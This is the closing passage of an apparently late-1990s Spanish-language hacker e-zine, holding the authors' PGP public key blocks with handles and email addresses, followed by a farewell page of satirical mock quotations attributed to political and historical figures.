wEPwpVsYjY67VYy4XTjTNP18F1dDox0YbN4zISy1Kv884bEpQBgRjXyEpwpy1obE
AxnIByl6ypUM2Zafq9AKUJsCRtMIPWakXUGfnHy9iUsiGSa6q6Jew1XrPdYXAAIC
EACSSTN7roDGRmGohAOsqJpI60PKdgjCKGWrVYynv10Olg7V5Pycq3GV1+ZJydhn
UKs/x8MxghHj/VwZ5FftDYiK/za0Tnq1E63HEj43BLbvrGwnsov7wNiknzvjnEHp
UCc84uYhFqKaPfWafDLWKI4GsTI0x7RgQ0Vpn6Kxu/necFnT/AmEUvFQPkkBl8xI
5znTLn9wwb2FlOq2HBRW4F+bQaQaKpL5fWGFWw1ZPmven2RvA5XyeDuUBsbj/OkL
RQu9VlXb3mmD/rl0rzHK5tqPOmCp3IFTp/JY9TNbA1wEMC+WHsk1P2sE3fOYwP/0
w8xz2WpN83N12XB/rgrMaKUOrqn8sq7khYIasZITKZ23QAUAHu3mspVBjYvTKFqF
ih2xtEZi7rFeROxSM3gSobWbbL7eXYT1fXZkKYP5w3POD50vw2an9qItdCXjv9wz
7xD6ent7YpOiloPnal+3GMEHSsAPEwsfzz1l3Eirs6v5hMJQwiWJWRYwQe2rO/4Z
gCNl+2FFUTonOOIIetMxENwSNpBH4PGboLZj/sj3IyNJGa0C7fu+1qHVFF0pxSIR
KavkOPFl8BW4TnJCUCMa13QfxATvOqOiC9Y4ZVaUr9wD2+Czgd+xByFI7gwFQWgD
ZYr57ytKKcsFc8wp9ru+K2iv0CMkQs7QyvxbRN4qjZz4NIkAPwMFGDV6jbPzs12Y
6YPcYhECP48AoOk2UN0H/aa/dMjCjPZMPLs0Dt38AJ9ryQhkTcLGOLQOWZiGR2Fp
4XwaDg==
=crAP
-----END PGP PUBLIC KEY BLOCK-----

<<::Azumlord::>> // azumlord@iname.com

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: PGPfreeware 5.5.3i for non-commercial use <http://www.pgpi.com>

mQENAzPjTJ8AAAEIAPK1KI9F97qe09G16Rstzd1tlELbGmgRy8UPyzUkvMOTXIS9
onTp5gM3VEg8vJjCT9QrHsz6g0qRzttCO/+ixiHakVK3pzRO8EudwCVVEDECwAmM
aTDdspOZEn/mwoIO/UsAHAxQAuXNXL4JqscJ/ZNAlySchJgVk5KngyqMXlqpmwNW
CO7Gh4Ese2saJ++xvXWQHb+iBLHd/xo3cvNeJg5dFT2W/AjXa4WS/pXFmr5v8tut
yQIxJ4gw1XnEkoKlPIRQXLmHqs0Ct9069FbomKcfxb7mKbIIcAOhBKzhRtCQGiwJ
1yZOz61feAmCZTGT+wIcq0UGSeaQRzAu7Fxr5k0ABRG0IEF6dW0gTG9yZCA8QXp1
bUxvcmRAaG90bWFpbC5jb20+iQEVAwUQM+NMoEcwLuxca+ZNAQHi8ggAoRY+l28w
xlFbSB+Fb32pvBrHjuTSTtsfJqtKMbwx9Ot++3TWW9G+WgeHtdlSnMXMlfe5+Ft2
MxQwXfqMR4OzgyBVnkoaPH0Z2PBz6Cij44sLCrEQ+nZnpPAMTe60NCRphKwbXMGK
h8TNlIxxxPxtZSzO40dO4Rw5EkJcUQyykHmyHtzz/Ld7YfGYQmMEn40r2oX1k0/4
c8iJ1zrnzG6aiLKsvbm33SUx4wr9Q/0eBXALpijgzEs9PSau/ByCWEOwPJVpK2tQ
MaBF4rfm53UJxOCUBU8zYbG1rNUTY6UpYvvffnyaPzPoIZd2reYxY5i44WJCEXMF
+aRDrCB+VURqtg==
=r674
-----END PGP PUBLIC KEY BLOCK-----

Cytorax // cytorax@bigfoot.com

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: PGPfreeware 6.0 for non-commercial use <http://www.pgp.com>

mQCNAzSFCWgAAAEEAMfbmLIFrwArZmk6mM9B1kDJb9TFWpBpF5GoWfZyZvqlOMV0
e/0ngWnisCQcbZy42knU3brXuwyOzyRZ4DrfPfnGmShx8FpEM/uCszQYF00JQsWD
95Emq1I5d0V+BUAtoaMeCZn6dU5sgteImgIAxDR5lx4r8yWq70jBPfwtI2dNAAUR
tB1DeXRvcmF4IDxDeXRvcmF4QGJpZ2Zvb3QuY29tPokAlQMFEDSFCWlIwT38LSNn
TQEBSeoEAMBzsNwdq1A4EXT9ZkEwgSCeLofv7rUoJn4w75FvEBCfofijDWUwCkQJ
FHGwcnAW4xg0wJzs4MByjSEvLnxCB++BmwGM6l8/NiyrolDk7rnOaHI1tU0wcCmz
oNhHQdrfL0zmRNlR5QvXqlPnRxCB/GgLXLyrJGtvoDtv6U3SaL4s
=Xw7I
-----END PGP PUBLIC KEY BLOCK-----


Guybrush // guybrush@cyberdude.com

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: PGPfreeware 6.0 for non-commercial use <http://www.pgp.com>

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
WT2KqINEIKul1WKXCwr6
=yQRv
-----END PGP PUBLIC KEY BLOCK-----


-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
                           -=( DESPEDIDA??? )=-
                      >> p0r 4zU/|\l0rd Y Cy70r4x <<
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

  NoTa: Solo apto para mentes rapidas, y claro con un poco de picardia
        mexicana.


             "No subira el dolar, ni el pan ni la tortilla...."
                     CSG antes de ocupar la presidencia

                   
                        "Espionaje????, nosotros???"
                     El FBI despues del caso Casa Blanca


               "Ya veras la transada que les doy a los gringos en esta
                operacion de compraventa..............."
                                     Santa Anna

                "Esos nacos gritones no me causan ni un dolor de
                 cabeza"
                          Maria Antonieta, Reina de Francia

                "No me volvere dictador aunque en ello me fuera
                 la vida.............."
                          Fidel Castro, Toma de Moncada

          " Traidor yo ?, !Anda a chingar a la mas vieja de tu casa"
                                     Judas



Esperamos que les halla gustado si tienen alguna duda o sugerencia favor de
comunicarlos a los telefonos 01-800-RareGaZz-HoTLiNe, nos vemos la proxima.

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-[EOT]-=-[EOF]-=-[EOT]-=-[EOF]-=-[EOT]-=-[EOF]-=-[EOT]-=-[EOF]-=-[EOT]-=-[EOF]
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
